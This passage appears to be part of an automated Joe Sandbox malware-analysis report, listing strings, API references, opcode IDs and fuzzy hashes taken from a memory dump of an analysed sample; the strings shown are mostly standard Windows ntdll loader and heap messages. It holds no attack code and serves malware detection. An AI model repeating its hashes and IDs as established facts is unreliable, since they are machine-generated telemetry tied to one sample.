                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01872178
                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01872165
                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01872180
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                  • Opcode ID: d741695dd3569e4fa90a579681ae9a34670d743557c2248cea26c83e55b5e217
                                                                                                                                                  • Instruction ID: 0c5558b9b4a636f655bbaec76e29c9edd269b3d80c883b280f07c69135124833
                                                                                                                                                  • Opcode Fuzzy Hash: d741695dd3569e4fa90a579681ae9a34670d743557c2248cea26c83e55b5e217
                                                                                                                                                  • Instruction Fuzzy Hash: 21313776B4021577EB229A999C55F5BBBBAFBA4B94F094059BB04E7200D270EF00C3E1
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 01842DF0: LdrInitializeThunk.NTDLL ref: 01842DFA
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BA3
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BB6
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D60
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D74
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1404860816-0
                                                                                                                                                  • Opcode ID: 32800993097451122569fffc98408aec1d88b75f5c3d6f37f5c097b8e5a27930
                                                                                                                                                  • Instruction ID: 324b1e80f3a4aff40e999eb9bd6048cff68b38e902d3430c91963f6fdbba510a
                                                                                                                                                  • Opcode Fuzzy Hash: 32800993097451122569fffc98408aec1d88b75f5c3d6f37f5c097b8e5a27930
                                                                                                                                                  • Instruction Fuzzy Hash: 9D423A75900719DFDB21CF68C880BAAB7F5BF44314F1445A9EA89DB241EB70EA84CF61
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                  • Opcode ID: 428501119cf1d70973560884d8f8d763e10ca204a32ec4b0b5aa84a96d6f21be
                                                                                                                                                  • Instruction ID: 5ee3b52cc20dc71e0a37f40072e8bfdf7517a10f0d65fc695995a219a736b8c7
                                                                                                                                                  • Opcode Fuzzy Hash: 428501119cf1d70973560884d8f8d763e10ca204a32ec4b0b5aa84a96d6f21be
                                                                                                                                                  • Instruction Fuzzy Hash: 52C19C7410878ACFD75ACF68C880B6AB7E4BF84708F044969F995CB291E735CB49CB52
                                                                                                                                                  Strings
                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0183855E
                                                                                                                                                  • @, xrefs: 01838591
                                                                                                                                                  • LdrpInitializeProcess, xrefs: 01838422
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01838421
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                  • Opcode ID: 8a469859718a973caf6af826bb3c017fe29480d6a2f9c8ba78df7a78f59b8693
                                                                                                                                                  • Instruction ID: d00a205faeb3bc943d26b056b88c0bd29ffa811ea2a978f10d0091199867be40
                                                                                                                                                  • Opcode Fuzzy Hash: 8a469859718a973caf6af826bb3c017fe29480d6a2f9c8ba78df7a78f59b8693
                                                                                                                                                  • Instruction Fuzzy Hash: 4E919D71548749AFD722DF25CC80E6BBAE8BB85744F440A2EFA84D2151E734DB448BA3
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018722B6
                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018721D9, 018722B1
                                                                                                                                                  • .Local, xrefs: 018328D8
                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 018721DE
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                  • Opcode ID: ad2bea92d1820031a419bb6d557898911dcda175a67065bbbbe3f068c9f0e480
                                                                                                                                                  • Instruction ID: 89a6864344931651f7c1d94e75dfee5177d8d8f37e1ce78b57eba22db1914d0d
                                                                                                                                                  • Opcode Fuzzy Hash: ad2bea92d1820031a419bb6d557898911dcda175a67065bbbbe3f068c9f0e480
                                                                                                                                                  • Instruction Fuzzy Hash: 3FA19D359012299BDB25CF68D884BA9B7B6BF98314F1841E9D908EB251D730DF81CFD1
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01873437
                                                                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01873456
                                                                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0187342A
                                                                                                                                                  • RtlDeactivateActivationContext, xrefs: 01873425, 01873432, 01873451
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                  • API String ID: 0-1245972979
                                                                                                                                                  • Opcode ID: 762a9fda0fa9dc03271d8bf8c2b1d9673689446fbfcb5cc35dc991d70328559c
                                                                                                                                                  • Instruction ID: 99de1c422a06b1d805dc27b9a31e3eaf3aaf90ce5c94d5a65e17ef0a51302184
                                                                                                                                                  • Opcode Fuzzy Hash: 762a9fda0fa9dc03271d8bf8c2b1d9673689446fbfcb5cc35dc991d70328559c
                                                                                                                                                  • Instruction Fuzzy Hash: 556122366007069BD72ACF1DC881B2AB7E5FFA4B24F188519EC55DB241CB30EA01CBD2
                                                                                                                                                  Strings
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01860FE5
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01861028
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018610AE
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0186106B
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                  • Opcode ID: 1f70b48e44922d9c525de04c02619b4441c4cbb0894a2405ff2a94908a43465e
                                                                                                                                                  • Instruction ID: 5372cd93f26b4e3b2f11181f7e43f82513d73ae687e59cd5d263fcca0ee6035a
                                                                                                                                                  • Opcode Fuzzy Hash: 1f70b48e44922d9c525de04c02619b4441c4cbb0894a2405ff2a94908a43465e
                                                                                                                                                  • Instruction Fuzzy Hash: 5D71CEB19043499FCB62DF18C884F977BA8AF95764F500468F948CB287E735D688CB92
                                                                                                                                                  Strings
                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0186A992
                                                                                                                                                  • apphelp.dll, xrefs: 01822462
                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 0186A998
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0186A9A2
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                  • Opcode ID: b20c1276d35a2d966b1333c7e3e4d4be99ee75874d87f073c806907312da8d66
                                                                                                                                                  • Instruction ID: 0bb94acd54f12448b67b6659d80231dd601991f887e81d36cae1b3c5dd9167f0
                                                                                                                                                  • Opcode Fuzzy Hash: b20c1276d35a2d966b1333c7e3e4d4be99ee75874d87f073c806907312da8d66
                                                                                                                                                  • Instruction Fuzzy Hash: 53315971A00201ABDB369F5DD885E6AB7BAFB84B04F25001EF911F7245D7709B81CF80
                                                                                                                                                  Strings
                                                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0181327D
                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01813255
                                                                                                                                                  • HEAP: , xrefs: 01813264
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                  • API String ID: 0-617086771
                                                                                                                                                  • Opcode ID: 2c6174c750daec04d0b244a3a051f3e3b69206ddb4b0ca40591feef2b2589f6a
                                                                                                                                                  • Instruction ID: 255149989574b59d6627537baed293a13a59a5bd73ae7efebf40e210ca6abd83
                                                                                                                                                  • Opcode Fuzzy Hash: 2c6174c750daec04d0b244a3a051f3e3b69206ddb4b0ca40591feef2b2589f6a
                                                                                                                                                  • Instruction Fuzzy Hash: 1292BC72A042499FDB25CF68C440BAEBBF6FF48314F188459E849EB35AD734AA45CF50
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $@
                                                                                                                                                  • API String ID: 0-1077428164
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpCheckModule, xrefs: 0186A117
                                                                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0186A10F
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0186A121
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-161242083
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-1334570610
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 018782DE
                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 018782D7
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018782E8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1783798831
                                                                                                                                                  Strings
                                                                                                                                                  • @, xrefs: 018BC1F1
                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018BC1C5
                                                                                                                                                  • PreferredUILanguages, xrefs: 018BC212
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                  • API String ID: 0-2968386058
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                  • API String ID: 0-1373925480
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpCheckRedirection, xrefs: 0188488F
                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01884888
                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01884899
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                  • API String ID: 0-3154609507
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-2558761708
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpInitializationFailure, xrefs: 018820FA
                                                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 018820F3
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01882104
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: #%u
                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                  Strings
                                                                                                                                                  • LdrResSearchResource Enter, xrefs: 0180AA13
                                                                                                                                                  • LdrResSearchResource Exit, xrefs: 0180AA25
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                  • API String ID: 0-4066393604
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: `$`
                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$MUI
                                                                                                                                                  • API String ID: 0-17815947
                                                                                                                                                  Strings
                                                                                                                                                  • kLsE, xrefs: 01800540
                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0180063D
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                  Strings
                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0180A2FB
                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0180A309
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: MUI
                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .mui
                                                                                                                                                  • API String ID: 0-1199573805
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: EXT-
                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: BinaryHash
                                                                                                                                                  • API String ID: 0-2202222882
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: #
                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: BinaryName
                                                                                                                                                  • API String ID: 0-215506332
                                                                                                                                                  Strings
                                                                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0188895E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                  • API String ID: 0-702105204
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b96f2c41293cb23b851b9f356e9cdbee860f758cdc4d5792a59fe823dd8b33ef
                                                                                                                                                  • Instruction ID: 494d3fcfa8b50ec21ca1a2db9b6822149b6fd957ed3a8f2d10d25239b5fe89a4
                                                                                                                                                  • Opcode Fuzzy Hash: b96f2c41293cb23b851b9f356e9cdbee860f758cdc4d5792a59fe823dd8b33ef
                                                                                                                                                  • Instruction Fuzzy Hash: 80E19F71508345CFC756CF28C880A6ABBE1FF89314F148A6DE595C7391EB31EA15CB92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 381a8f48ebe9ba435308cb229dae1d0a6113696ab0750126548f74d9fd1b5523
                                                                                                                                                  • Instruction ID: 0d64fa971943df8115d79774e07879579b806675a9eb4ded3b90b4cac03256d4
                                                                                                                                                  • Opcode Fuzzy Hash: 381a8f48ebe9ba435308cb229dae1d0a6113696ab0750126548f74d9fd1b5523
                                                                                                                                                  • Instruction Fuzzy Hash: 57D1C371A0060A9BDB14DF68C880BBBB7E5FF54314F14466DEA15DB381E734DA50CB62
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                  • Instruction ID: ba19f1ec713c1acffe1772e406fb6381ce1e55ba25d583c00de13c1ea5d11004
                                                                                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                  • Instruction Fuzzy Hash: CCB1A574A006099FDF24EF98C940EABBBB9FF86304F94445DAA02D7791DB74EA05CB10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                  • Instruction ID: e64c1ae80a20750c2decfa1e52cb4a9dd8695febce881101b7ce0dcae61f7e54
                                                                                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                  • Instruction Fuzzy Hash: 79B1053260464AAFDB11CBA8CC50BBEBBFAAF44304F140555E652DB385DB30EB81CB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                                                  • Instruction ID: aa696d72eaf45fae5aedd2be7453c322dca90e00ab7e36d075bbe0d120954268
                                                                                                                                                  • Opcode Fuzzy Hash: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                                                  • Instruction Fuzzy Hash: C0C169706083458FD765CF19C884BABB7E9BF88304F44492DE989C7291D775EA48CF92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                                                  • Instruction ID: 32d9118590433cd8ab0e619d56509956c61f4adbf46fc64e3cc83f45ec92865d
